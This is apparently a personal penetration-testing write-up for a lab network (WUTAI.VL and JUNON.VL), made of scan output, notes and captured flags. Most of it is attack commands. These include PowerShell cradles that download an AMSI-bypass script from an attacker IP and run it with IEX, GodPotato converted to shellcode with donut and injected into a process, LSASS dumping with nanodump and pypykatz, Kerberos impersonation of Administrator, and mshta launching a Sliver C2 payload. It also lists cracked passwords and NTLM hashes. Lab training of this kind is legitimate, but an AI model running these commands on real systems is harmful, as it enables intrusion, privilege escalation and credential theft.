Executive Summary
Our Task is to do external black box penetration testing on WUTAI.VL. It aslo has a subsidiary JUNON.VL. There was a recent secret leak on paste bin. we can access that with the following password. https://pastebin.com/BBZkJGU1
KE37vTed5SThe goal of this engagement is to reach enterprise Administrator in the WUTAI.VL.
Key Findings
Attack Flow and Narrative
Detailed Findings
The external IP range is
172.16.20.0/24After scanning the whole network we found two reachable host in this IP range.
| Machine Name | IP |
|---|---|
| 172.16.20.50 | |
| 172.16.20.100 |
172.16.20.50
172.16.20.100
We found a list of users from work.junon.vl on the paste bin.
We first create a password list which we can use to brute force the found users.
generate_passwords.py
172.16.20.50
sudo nmap -sC -sV -T4 -p- -oA 172.16.20.50 172.16.20.50 -vvv | Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 |
| 8080 | http-proxy | Squid http proxy 5.2 |
- Runs squids proxy on port 8080.
- We can try connecting to this proxy and see if we can access the internal network if the configuration allows us.
proxychains -f /etc/proxychains4.conf cme smb 172.16.20.0/24 2>/dev/nullproxychains -f /etc/proxychains4.conf cme ssh 172.16.20.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme smb 172.16.21.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme ssh 172.16.21.0/24 2>/dev/null
proxychains -f /etc/proxychains4.conf cme smb 172.16.19.0/24 2>/dev/null
User:Password
After Brute Forcing we found following valid users.
| Usename | Password |
|---|---|
| Wendy.Vincent | Summer2023 |
| Hazel.Simpson | Summer2023 |
| Terry.Lowe | Summer2023 |
| Melanie.Mueller | Summer2023 |
| Wendy.Vincent | Summer2023 |
| Jade.Watson | Winter2022 |
| Hollie.Parker | Winter2022 |
| Sarah.Allen | Wutai2023 |
| Tom.Perkings | Wutai2023 |
| Roger.Ball | Junon2023 |
172.16.20.100
sudo nmap -sC -sV -T4 -p- -oA 172.16.20.100 172.16.20.100 -vvv| Port | Service | Version |
|---|---|---|
| 22 | ssh | OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 |
| 443 | ssl/http | nginx |
-
Running Kasm on the port 443 which allows us to connected to virtual desktop if we know the valid user names and password.
-
So I used the creds of Roger.Ball to access the kasm virtual desktop.
Work.Junon.VL
172.16.21.240 (s021v010)
sshmachine
root 7d3XHR8uTgg2aB
172.16.21.10 (S021M005)
- Domain - work.junon.vl
- Most likely domain controller as signing is set to true
| smb |
|---|
| winrm |
| rdp |
172.16.21.140 (S021W105)
- Domain - work.junon.vl
| rdp |
|---|
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: WORK-JUNON
| NetBIOS_Domain_Name: WORK-JUNON
| NetBIOS_Computer_Name: S021W105
| DNS_Domain_Name: work.junon.vl
| DNS_Computer_Name: S021W105.work.junon.vl
| DNS_Tree_Name: work.junon.vl
| Product_Version: 10.0.19041
|_ System_Time: 2024-07-24T09:15:38+00:00
| ssl-cert: Subject: commonName=S021W105.work.junon.vl
| Not valid before: 2024-02-27T11:03:30
|_Not valid after: 2024-08-28T11:03:30
|_ssl-date: 2024-07-24T09:15:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
- From the manage engine instance from 172.16.21.195 (S021M015) we see a this machine.
Initial Foothold as SYSTEM
- we open the powershell or command Prompt
(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
- Ran the above command as system and carly.adams
VL{19a947c8712201ea96c9b5666c721094} ### Flag4.txt ### Submitted
proxychains -f /etc/proxychains4.conf xfreerdp /u:Carly.Adams /p:ZMskoMXML_qC17 /v:172.16.21.140
- Edge browser
root 7d3XHR8uTgg2aB
172.16.21.195 (S021M015)
- Domain - work.junon.vl
- smb signing is set to false
We did share enum form 172.16.21.180.
PORT STATE SERVICE REASON 80/tcp open http syn-ack 111/tcp open rpcbind syn-ack 135/tcp open msrpc syn-ack 139/tcp open netbios-ssn syn-ack 443/tcp open https syn-ack 445/tcp open microsoft-ds syn-ack 2049/tcp open nfs syn-ack 3389/tcp open ms-wbt-server syn-ack 8080/tcp open http-proxy syn-ack 8083/tcp open us-srv syn-ack 8383/tcp open m2mservices syn-ack 8443/tcp open https-alt syn-ack
Read data files from: /usr/bin/../share/nmap
| smb |
|---|
| winrm |
| rdp |
- login with admin creds with OTP from KEEpass
172.16.21.180 (S021M010)
- Domain - work.junon.vl
- smb signing is set to false
| smb |
|---|
| winrm |
Initial Access
Got RDP access to the machine after logging in on 172.16.20.100
iwr http://10.8.0.154/amsi64.txt | IEX
VL{f8ac47197978c087b4b882e84fbdc328} ### Flag1.txt ### Submitted
Privilege Escalation
upload test.aspx
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.0.154:80/amsi64.txt')"
upload sharp.ps1
./donut -i /home/jay/vulnlab/breach/GodPotato-NET4.exe -a 2 -b 2 -o /tmp/payload.bin -p '-cmd "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -executionpolicy bypass -file c:\windows\tasks\sharp.ps1"'
execute notepad.exe
ps -e notepad
execute-shellcode -p 3604 /tmp/payload.bin
ps
VL{3ee23591eab673b8769fe3b1a75b858a} flag2.txt Submitted
Post Exploitation / Host Recon
Credential Theft
nanodump 684 test 1 PMDM
download test
python3 -m pypykatz lsa minidump test
Loot
Username: S021M010$
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929
Administrator:500:aad3b435b51404eeaad3b435b51404ee:748b542e4b5450664592e7d256edc4b5:::
proxychains -f /etc/proxychains4.conf getST.py -self -impersonate "Administrator" -altservice "cifs/S021M010.work.junon.vl" -dc-ip 172.16.21.10 work.junon.vl/'s021m010$' -hashes aad3b435b51404eeaad3b435b51404ee:8d7070b48346d843e63616b99f048929
Host recon
Found config.xml
<?xml version="1.0"?>
-<securepass>
<username>svc_me</username>
<password>SP81274145f4a5857b839ee7b500f1d66e8a044d12211781b515e7bae67bb7abce</password>
</securepass>
- flag in amy.ball home
VL{3387261d92644002942061cfea267da2} flag3.txt submitted
- Reverse Engineered Password
Decrypt the Secure pass file
- Watch the video part 3.
- 8623050922ab890bbd2f79886cd6809f (key)
- 81274145f4a5857b839ee7b500f1d66e (IV)
- 8a044d12211781b515e7bae67bb7abce (pass)
- Password = jYEp9bq32KFLVL!
- Username = svc_me
Now we need to find a machine that runs manage engine.
EU.JUNON.VL
172.16.21.222 (S021M200)
- Domain - eu.junon.vl
- Most likely domain controller as singing is set to true.
| smb |
|---|
| winrm |
| rdp |
172.16.21.223 (S021M215)
- Domain - eu.junon.vl
| rdp |
|---|
Extra machines
172.16.21.15
sshmachine
APPENDIX
Resource Development for Sliver C2
- Created sph.exe
- created sliverphollow64.txt
Getting Shells
cme smb 172.16.225.194 -u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.8.0.154/sliver64.hta"(New-Object System.Net.WebClient).DownloadString('http://10.8.0.154/amsi64.txt') | IEX
iwr http://10.8.0.154/amsi64.txt | IEXpowershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.8.0.154:80/amsi64.txt%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.2.41:80/amsi64.txt')"